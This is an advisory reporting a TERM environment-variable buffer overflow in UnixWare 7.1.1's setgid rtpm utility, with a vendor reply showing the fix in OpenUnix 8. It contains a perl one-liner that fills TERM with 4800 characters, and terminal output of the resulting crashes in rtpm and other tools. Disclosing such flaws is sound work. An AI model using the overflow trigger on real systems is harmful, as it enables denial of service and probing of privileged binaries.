Vulnerability

    rtpm

Affected

    Unixware 7.1.1

Description

    Aycan Irican found following.

        $ uname -a
        UnixWare paris 5 7.1.1 i386 x86at SCO UNIX_SVR5
        (this is a two node NSC)

        $ id
        uid=101(fixxxer) gid=1(other)
        $ ls -al /usr/sbin/rtpm
        -r-xr-sr-x    1 bin      sys          288324 Mar 22 22:35 /usr/sbin/rtpm
        $ export TERM=`perl -e 'printf "B"x4800'`
        $ rtpm
        Memory fault
        $ bash
        Memory fault(coredump)
        $ vi
        Memory fault(coredump)
        $ ndcfg
        Memory fault(coredump)
        $ scoadmin
        Fatal error: (vTcl interp) Connection closed unexpectedly - No Data
        Error Information logged to: /tmp/tclerror.131977.log
        $ more
        Memory fault
        $ man sendmail
        /usr/bin/html2ascii: line 34: 132022: Memory fault
        $ /usr/local/bin/less
        Memory fault
        $ /usr/local/bin/gdb rtpm
        Memory fault

    Lots of bugs...self-explained...

Solution

    The  bash  shell,  and  anything  in /usr/local/bin is not shipped
    with, nor  supported on  7.1.1.   The standard  commands that  you
    cite do  fail in  7.1.1.   These have  been fixed  in our upcoming
    release of OpenUnix 8 (the next release of UnixWare):

        $ ksh -o emacs
        $ export TERM=`perl -e 'printf "B"x4800'`
        $ /usr/sbin/rtpm
        TERMINFO pathname for device exceeds 512 characters.
        $ ndcfg
        BBB ... BBB:terminfo too long
        ndcfg>
        $ scoadmin
        TERMINFO pathname for device exceeds 512 characters.
        Fatal error: (vTcl interp) Connection closed unexpectedly - No Data
        Error Information logged to: /tmp/tclerror.18226.log
        $